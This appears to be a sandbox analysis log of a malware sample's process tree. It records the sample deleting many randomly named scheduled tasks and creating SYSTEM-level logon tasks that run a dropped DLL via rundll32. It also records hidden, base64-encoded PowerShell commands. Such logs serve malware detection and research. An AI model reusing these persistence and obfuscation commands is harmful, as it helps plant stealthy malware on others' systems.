C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jzhFTGrHTBEHdwhDlHk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DhjJYrdSzhVIWJoLuaT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DhjJYrdSzhVIWJoLuaT2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "EEmPqVqEkOrqytjIixi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "EEmPqVqEkOrqytjIixi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DuQhIaNDUkixqBSFQah"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DuQhIaNDUkixqBSFQah2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XOocscxzenxPQcbeNoc"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XOocscxzenxPQcbeNoc2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CpcpIyQZEHEGDGaVcoP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CpcpIyQZEHEGDGaVcoP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TEwqxUjyIqmpTYSBiqY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TEwqxUjyIqmpTYSBiqY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dcKGwvyalvyuxhUFuri"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dcKGwvyalvyuxhUFuri2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LjPBjCkxU\vQlWBX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RqexYqdylWmHLyb" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ODelVPTMCGECKgw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ODelVPTMCGECKgw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ODelVPTMCGECKgw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ODelVPTMCGECKgw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NuQkbDOvmjzyikR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NuQkbDOvmjzyikR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NuQkbDOvmjzyikR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NuQkbDOvmjzyikR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PVbqEphBRhdhSar"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PVbqEphBRhdhSar"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PVbqEphBRhdhSar2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PVbqEphBRhdhSar2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rXnzilGmloByZja"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rXnzilGmloByZja"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rXnzilGmloByZja2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rXnzilGmloByZja2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OrQOZlNdkHouDfl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OrQOZlNdkHouDfl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OrQOZlNdkHouDfl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OrQOZlNdkHouDfl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MPBTKOKNGQXdpYB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MPBTKOKNGQXdpYB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MPBTKOKNGQXdpYB2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MPBTKOKNGQXdpYB2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oHFOlowMWYvVWRa"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oHFOlowMWYvVWRa"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oHFOlowMWYvVWRa2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oHFOlowMWYvVWRa2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZhEuxlviVGbffes"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZhEuxlviVGbffes"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZhEuxlviVGbffes2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZhEuxlviVGbffes2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BzuHQmwIdSJdkMh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BzuHQmwIdSJdkMh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BzuHQmwIdSJdkMh2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BzuHQmwIdSJdkMh2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BrpDRukwPjenXAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BrpDRukwPjenXAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BrpDRukwPjenXAP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BrpDRukwPjenXAP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sgHQxILjtpUwkEl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sgHQxILjtpUwkEl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sgHQxILjtpUwkEl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sgHQxILjtpUwkEl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rOlVqeNcMNUSjbL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rOlVqeNcMNUSjbL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rOlVqeNcMNUSjbL2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rOlVqeNcMNUSjbL2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vzkuwrRCcPzOovd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vzkuwrRCcPzOovd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vzkuwrRCcPzOovd2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vzkuwrRCcPzOovd2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JciSvjuACFCpPuk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JciSvjuACFCpPuk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JciSvjuACFCpPuk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JciSvjuACFCpPuk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RvLAFMCfsYAmjBx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RvLAFMCfsYAmjBx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RvLAFMCfsYAmjBx2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RvLAFMCfsYAmjBx2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xnzNwjgxPIMAgxD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xnzNwjgxPIMAgxD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xnzNwjgxPIMAgxD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xnzNwjgxPIMAgxD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "upvCizsQstLVhTX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "upvCizsQstLVhTX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "upvCizsQstLVhTX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "upvCizsQstLVhTX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sebDCftpEoxQGwR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sebDCftpEoxQGwR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sebDCftpEoxQGwR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sebDCftpEoxQGwR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kGGYvMdxzKuBmUA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kGGYvMdxzKuBmUA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kGGYvMdxzKuBmUA2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kGGYvMdxzKuBmUA2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VlcqrMUnqCdtcYE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VlcqrMUnqCdtcYE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VlcqrMUnqCdtcYE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VlcqrMUnqCdtcYE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yyQridzVWXzzcT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yyQridzVWXzzcT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FCfOZWamfTDXrH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FCfOZWamfTDXrH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pvGIKDreVSBaRR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pvGIKDreVSBaRR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jIbkXIHNAklabT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jIbkXIHNAklabT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nfEzZvDJpGIxHg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nfEzZvDJpGIxHg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ExPuUBSIqiUvrE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ExPuUBSIqiUvrE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nGHNjHLpNVwfpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nGHNjHLpNVwfpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "szhqlLvvAtuMdL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "szhqlLvvAtuMdL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UChhjnNtERVtch"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UChhjnNtERVtch"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SvPmLaFiyNhJEE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SvPmLaFiyNhJEE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XtUsujuJqCIjis"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XtUsujuJqCIjis"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mmnKyFwKoxWldP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mmnKyFwKoxWldP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YIRiNcmpuGXKMp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YIRiNcmpuGXKMp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dOGQydlyhLHPZb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dOGQydlyhLHPZb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bUqXeDfXwDeSyh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bUqXeDfXwDeSyh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kFksENUvgeEftn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kFksENUvgeEftn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WeIhAxgzFxFdin"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WeIhAxgzFxFdin"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pSvwJbqBxDXeSH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pSvwJbqBxDXeSH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "AWsjqmbGbjSzjt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AWsjqmbGbjSzjt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WIZvCLhyiJeIYW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WIZvCLhyiJeIYW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hvhndarYUHapy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hvhndarYUHapy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hvhndarYUHapy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hvhndarYUHapy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vYnQEgzpFpMeU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vYnQEgzpFpMeU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vYnQEgzpFpMeU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vYnQEgzpFpMeU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eLcVqmXNBWwuu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eLcVqmXNBWwuu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eLcVqmXNBWwuu2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eLcVqmXNBWwuu2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZmZKbjdnaUYqy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZmZKbjdnaUYqy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZmZKbjdnaUYqy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZmZKbjdnaUYqy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pSdZUpBHWsjUN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pSdZUpBHWsjUN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pSdZUpBHWsjUN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pSdZUpBHWsjUN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BDTQSCAhuviSt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BDTQSCAhuviSt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BDTQSCAhuviSt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BDTQSCAhuviSt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bnDdviFrBdSHm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnDdviFrBdSHm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bnDdviFrBdSHm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnDdviFrBdSHm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oqzeCtSumDxKN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oqzeCtSumDxKN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oqzeCtSumDxKN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oqzeCtSumDxKN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oRWdzfOuEBFOt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oRWdzfOuEBFOt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oRWdzfOuEBFOt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oRWdzfOuEBFOt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SqVkWMCzQJLkq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SqVkWMCzQJLkq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SqVkWMCzQJLkq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SqVkWMCzQJLkq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pepCFjUQgLQiC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pepCFjUQgLQiC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pepCFjUQgLQiC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pepCFjUQgLQiC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "uHiXiVeYNhlEV"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uHiXiVeYNhlEV"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "uHiXiVeYNhlEV2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uHiXiVeYNhlEV2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzgsIWcHHmecE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzgsIWcHHmecE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzgsIWcHHmecE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzgsIWcHHmecE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YAjsxgSIQquBU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YAjsxgSIQquBU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YAjsxgSIQquBU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YAjsxgSIQquBU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vnRCnXJDjFgly"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vnRCnXJDjFgly"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vnRCnXJDjFgly2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vnRCnXJDjFgly2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "URrITWkPVtIxr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "URrITWkPVtIxr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "URrITWkPVtIxr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "URrITWkPVtIxr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fvbPtJKIKiiYC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fvbPtJKIKiiYC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fvbPtJKIKiiYC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fvbPtJKIKiiYC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qFUWsypIjqyCl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qFUWsypIjqyCl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qFUWsypIjqyCl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qFUWsypIjqyCl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dTnpxKxkbKsoZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dTnpxKxkbKsoZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dTnpxKxkbKsoZ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dTnpxKxkbKsoZ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iTtFzCTVRGxRt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iTtFzCTVRGxRt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iTtFzCTVRGxRt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iTtFzCTVRGxRt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RqexYqdylWmHLyb2" /F /xml "C:\Program Files (x86)\LjPBjCkxU\iXGGmtk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RqexYqdylWmHLyb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RqexYqdylWmHLyb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RcKzCxNzDspESg" /F /xml "C:\Program Files (x86)\EkAcBLsehYBU2\nTMNVQy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mYkAlnQzdfnWB2" /F /xml "C:\ProgramData\PtxASTBQXXYOENVB\yoUakDA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FbVloGRvRXpHpvUoC2" /F /xml "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\PjAmsXW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dcKGwvyalvyuxhUFuri2" /F /xml "C:\Program Files (x86)\WEPOREuymMJJC\EwEvpwW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 2682⤵
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {E85A9CBA-71AC-4CDD-BD4C-AC8811269874} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
